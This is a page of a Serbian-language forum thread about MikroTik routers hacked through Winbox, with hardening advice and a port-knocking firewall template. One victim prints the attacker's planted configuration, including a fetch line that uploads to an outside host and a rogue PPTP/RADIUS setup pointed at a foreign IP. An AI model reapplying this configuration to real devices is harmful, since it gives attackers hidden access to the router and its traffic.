Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Mikrotik v6.41.2 hakovan! Obratite paznju!

[es] :: Wireless :: Mikrotik :: Mikrotik v6.41.2 hakovan! Obratite paznju!

Strane: 1 2 3

[ Pregleda: 6869 | Odgovora: 44 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Branimir Maksimovic
Senior Software Engineer

Član broj: 64947
Poruke: 5442
*.bvcom.net.



+1054 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 11:15 - pre 38 meseci
Da da, pogotovo to. Ja sam otvorio ssh na nestandardnom portu i za godinu dana nisam imao nijedan pokusaj upada. A na 8080 vrtim neki svoj web koji samo vraca hello world i belezi ko sve pokusava da se nakaci i da vidis tu na 8080 koji je standardan port tusta i tma pokusaja hakovanja ;)
press any key to continue or any other to quit....
 
Odgovor na temu

DynDNS
Beograd

Član broj: 274168
Poruke: 103
87.116.180.*

Sajt: juniper.net


+4 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 13:45 - pre 38 meseci
Zašto ne koristite jednu vrlo zgodnu opciju ?
Svi portovi su zatvoreni ka internetu a otvarate ih kada vam zatreba.
 
Odgovor na temu

bachi
Vladimir Vučićević
System administrator
Beograd, Srbija

Član broj: 17912
Poruke: 5104

Sajt: www.bachi.in.rs


+2760 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 15:30 - pre 38 meseci
Kako ih otvoriš spolja?
... Vladimir Vučićević aka. Bachi
~~~ www.bachi.in.rs <<<<>>>> [email protected]
>>> It's nice to be important, but it's more important to be nice...
 
Odgovor na temu

DynDNS
Beograd

Član broj: 274168
Poruke: 103
87.116.180.*

Sajt: juniper.net


+4 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 16:16 - pre 38 meseci
Prozivanjem odredjenih portova, odredjenim REDOSLEDOM, sa ISTE source adrese, vremenski razmak prozivanja portova "do X sekundi" ruter kreira firewall allow pravilo koje traje xx minuta za odredjeni port samo za TU SOURCE adresu.

Mogu kasnije postaviti code za mtik.
 
Odgovor na temu

bachi
Vladimir Vučićević
System administrator
Beograd, Srbija

Član broj: 17912
Poruke: 5104

Sajt: www.bachi.in.rs


+2760 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 16:40 - pre 38 meseci
U jeeeee, nisam znao za to.
... Vladimir Vučićević aka. Bachi
~~~ www.bachi.in.rs <<<<>>>> [email protected]
>>> It's nice to be important, but it's more important to be nice...
 
Odgovor na temu

Branimir Maksimovic
Senior Software Engineer

Član broj: 64947
Poruke: 5442
*.bvcom.net.



+1054 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 16:51 - pre 38 meseci
Meni samo nije jasno kako korisnik da uradi to prozivanje ;p
press any key to continue or any other to quit....
 
Odgovor na temu

milosbeo
Loading...

Član broj: 220015
Poruke: 438
*.dynamic.sbb.rs.

Sajt: www.umrezen.in.rs


+82 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 17:04 - pre 38 meseci
^^
kljucna rec: port knocking :)

To je vec next level :)

Razbijen je winbox port, tako da napadac pristupi bazi sa passwordima...
Ili poslednja verzija softvera ili jos bolje firewall.
 
Odgovor na temu

bachi
Vladimir Vučićević
System administrator
Beograd, Srbija

Član broj: 17912
Poruke: 5104

Sajt: www.bachi.in.rs


+2760 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 17:21 - pre 38 meseci
Hvala, svaki dan naučim po nešto novo. :D
... Vladimir Vučićević aka. Bachi
~~~ www.bachi.in.rs <<<<>>>> [email protected]
>>> It's nice to be important, but it's more important to be nice...
 
Odgovor na temu

DynDNS
Beograd

Član broj: 274168
Poruke: 103
*.fco.mts.telekom.rs.

Sajt: juniper.net


+4 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 18:09 - pre 38 meseci
Prozivanje može da se ostvari iz brousera, raznih programa za pc, android, ios.....
 
Odgovor na temu

zecos
web

Član broj: 38944
Poruke: 183



+1 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 19:11 - pre 38 meseci
Citat:
linux_wlan:
Kako si obrisao skriptu ako je hackovan "kako treba" verovatno ne mozes da mu pridjes sa poznatim user/pass i da se ulogujes na njega.


Sifra nije bila promenjena, u veoma kratkom vremenu sam primetio...
 
Odgovor na temu

linux_wlan
Aleksandar Nikolic
Loznica

Član broj: 10867
Poruke: 355
*.com
Via: [es] mailing liste

ICQ: 250378697


+9 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 19:22 - pre 38 meseci
Nije dobro haknut cim je ostao user/pass nepromenjen

[Ovu poruku je menjao linux_wlan dana 16.06.2018. u 20:45 GMT+1]
 
Odgovor na temu

zivanicd
Dejan Zivanic
KLADOVONET ISP
Kladovo

Član broj: 137218
Poruke: 1120
*.CyberCity.KladovoNet.Com.

Sajt: www.kladovo.net


+138 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 21:53 - pre 38 meseci
Sto pominje DynDNS:

Prvo odaberes portove i redosled :) (recimo 5555,6666,5566)
Napravi da input ka tim portovima generise neke dynamicke liste (address-list).
Pa uradis sa telefona/kompa/tableta... telnet prvo na port 5555, tvoja IP adresa se upise u listu pristup5555, isto tako i za ostale liste...

Onda napravi pravilo:
sve sto dolazi na prvu listu, prelazi u stage2, pa sto dolazi u drugu prelazi u stage3 pa sto dolazi u trecu prelazi u stage4. Nakon faze 4 stavis ACCEPT za mikrotik i pristupas mu kako hoces...

Unazad ovo pravilo sluzi za neki antispam/antiddos i sl...

Lepo i elegantno...

Naravno ozbiljan administrator ce svoju mrezu zastititi prvo spolja a posle i od svojih korisnika...

Nisam ulazio u problematiku ovog remote exploita, ali vidim da ima veze sa SMB portom koji je inace oduvek bio problematican i za te portove su vezani gomila exploitova. Ko se seca legentarnog TEARDROP-a koji nam je oslobadjao pristupne linije Telekoma/PTT-a/YUBC-a/Beotela i YUPAK-a zna o cemu pricam :)

SMB je bezvezna stvar na mikrotiku.



 
Odgovor na temu

DynDNS
Beograd

Član broj: 274168
Poruke: 103
87.116.180.*

Sajt: juniper.net


+4 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 21:55 - pre 38 meseci
Code:



/ip firewall filter   

add chain=input action=add-src-to-address-list address-list="Knock1" address-list-timeout=05s comment="Knock1 list - 05s" dst-port=48962 protocol=udp in-interface=ether1

add chain=input action=add-src-to-address-list address-list="Knock2" address-list-timeout=05s comment="Knock2 list - 05s" dst-port=57236 protocol=tcp src-address-list="Knock1" in-interface=ether1 

add chain=input action=add-src-to-address-list address-list="Knock3" address-list-timeout=05s comment="Knock3 list - 05s" dst-port=26786 protocol=udp src-address-list="Knock2" in-interface=ether1 

add chain=input action=add-src-to-address-list address-list="Safelist" address-list-timeout=10m comment="Safelist - 10m" dst-port=13897 protocol=tcp src-address-list="Knock3" in-interface=ether1  

add chain=input action=accept comment="Accept 80,22,8921 from IPs in Safe list" dst-port=80,22,8291 protocol=tcp src-address-list="Safelist" in-interface=ether1


Da pojasnim :

chain prvi osluskuje po udp portu 48962 prozivku. Kada se prozvka dogodi source adresu ubacuje u knock1 listu na 5 sekundi.

chain drugi osluskuje po tcp portu 57236 prozivku, kada se prozivka dogodi source adresu ubacuje u knock2 listu na 5 sekundi. Ali ovaj chain ima pravilo i da samo Knock1 lista ima allow da prozove port iz ovog chaina.

chain 3 : isto kao i chain 2

chain 4 isto kao i predhodna dva. Samo sto sam ja stavio ime liste Safelist u kojoj se source adresa zadrzava 10 minuta.

chain 5 : mislim da je jasan.

Naravno, template oblikujte svojim potrebama, postavite neke randum portove...
Takodje dodajte chain-ove da je ruter potpuno nevidljiv na internetu.




Pozdrav


[Ovu poruku je menjao DynDNS dana 16.06.2018. u 23:15 GMT+1]
 
Odgovor na temu

Living Light

Član broj: 331540
Poruke: 5446



+990 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 22:01 - pre 38 meseci
Izvinjavam se što kasnim sa "Roditeljskog"
Obećavam, da ću sve pomno i detaljno pročitati

(kačim cveće ispred zgrade,
bušim betonske grede, uvaljujem hilti tiplove, itd,)

-volim da je lepo ako može
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
*.init7.net.



+638 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!16.06.2018. u 23:57 - pre 38 meseci
@zivanicd

Nije neka filozofija za exploit. Prvi bajt definise velicinu source bafera, a nema provere da li moze da stane u destinacioni bafer, sto omogucava stack overflow.
 
Odgovor na temu

zastava10
Zarko Antic
Kragujevac

Član broj: 338709
Poruke: 9



Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!18.06.2018. u 15:21 - pre 38 meseci
Dakle ovako:

Ovo isto se desilo i meni u isto vreme, znaci pre 3 dana.
Posto se napad desio u isto vreme, mogu da smatram da je ovo dobro organizovano i da nije slucajno

Za pristup Mikrotiku koristio sam Winbox, u lokalu i sa Interneta.

Posledice su sledece:

Dodat je script:

/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\
?key=85454d8bb84998fa&action=upload&sncode=434017A7560235760C99A0FA08D602C5&dynamic=static")}

Nisam zapamtio koliko cesto se aktivirao.

Izmenjeno je ime routera:

set name=test

Dodato je sledece:

add name=pool1 ranges=10.1.1.2-10.1.1.250

/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test \
remote-address=pool1 use-encryption=yes

/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes

add action=masquerade chain=srcnat
add action=masquerade chain=srcnat

/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes

/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes







[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:33 GMT+1]

[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:37 GMT+1]
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
*.dynamic.isp.telekom.rs.



+638 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!18.06.2018. u 22:39 - pre 38 meseci
Meni ovo sve lici na ovaj novi VPNFilter malver.

Po poslednjim informacijama ovi modeli su ugrozeni:
Code:
Mikrotik Devices:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)
 
Odgovor na temu

zastava10
Zarko Antic
Kragujevac

Član broj: 338709
Poruke: 9



Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!19.06.2018. u 08:31 - pre 38 meseci
Router kod mene je RB3011 UiAS.

Ja sam posle ovog napada uradio update na verziju 6.42.3 koja je datirana na 24.05.2018

Vratio sam iz backupa "zdravu" konfiguraciju.

Promenio sam password.

Iskljucio sam www, www-ssl, api, api-ssl, ssh servise jer ih ne koristim.

Ostavio sam ftp, telnet i winbox koje sam stavio u address listu sa koje moze da se pristupa.


 
Odgovor na temu

linux_wlan
Aleksandar Nikolic
Loznica

Član broj: 10867
Poruke: 355
*.mbb.telenor.rs.

ICQ: 250378697


+9 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!19.06.2018. u 11:11 - pre 38 meseci
E ostavio si prave servise za kara*je. Da si birao ne bi bolje izabrao.
 
Odgovor na temu

Living Light

Član broj: 331540
Poruke: 5446



+990 Profil

icon Re: Mikrotik v6.41.2 hakovan! Obratite paznju!19.06.2018. u 11:14 - pre 38 meseci
BRAVO Alexandre,
i nek si mu rekao:

"ostavio si prave servise za kara*je. Da si birao ne bi bolje izabrao."

To, to, to, direkt u Target,
 
Odgovor na temu

[es] :: Wireless :: Mikrotik :: Mikrotik v6.41.2 hakovan! Obratite paznju!

Strane: 1 2 3

[ Pregleda: 6869 | Odgovora: 44 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.